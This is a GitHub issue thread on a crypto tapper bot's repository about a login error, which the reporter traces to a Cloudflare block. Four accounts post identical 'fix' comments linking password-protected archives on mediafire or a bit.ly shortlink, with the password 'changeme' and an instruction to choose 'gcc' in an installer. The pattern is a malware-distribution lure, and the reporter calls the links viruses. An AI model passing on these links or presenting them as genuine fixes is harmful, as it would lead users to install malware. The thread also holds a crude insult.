### ISSUE TITLE
Login Error

### ISSUE THREAD

**Issue by khosrowkhazraei** [TemoSulava/1win-tapper-claimer#4]
12:35:47.92 | ERROR    | utils.onewin:login:259 - login | Thread 0 | SessionName | 0, message='Attempt to decode JSON with unexpected mimetype: text/html; charset=utf-8', url=URL('https://crypto-clicker-backend-go-prod.100hp.app/game/start?user=%7B%22id%22:3

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by khosrowkhazraei** [comment]
You people sharing viruses. Shame on you

**Comment by khosrowkhazraei** [comment]
As i loged the response as print(await resp.text()), it returned claoudflare block respons as 
Please enable cookies.
Sorry, you have been blocked
You are unable to access 100hp.app
Why have I been blocked?

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by khosrowkhazraei** [comment]
I will get you mom instead

**Comment by TemoSulava** [comment]
I have no time to update the app. Pull requests will happily be accepted.
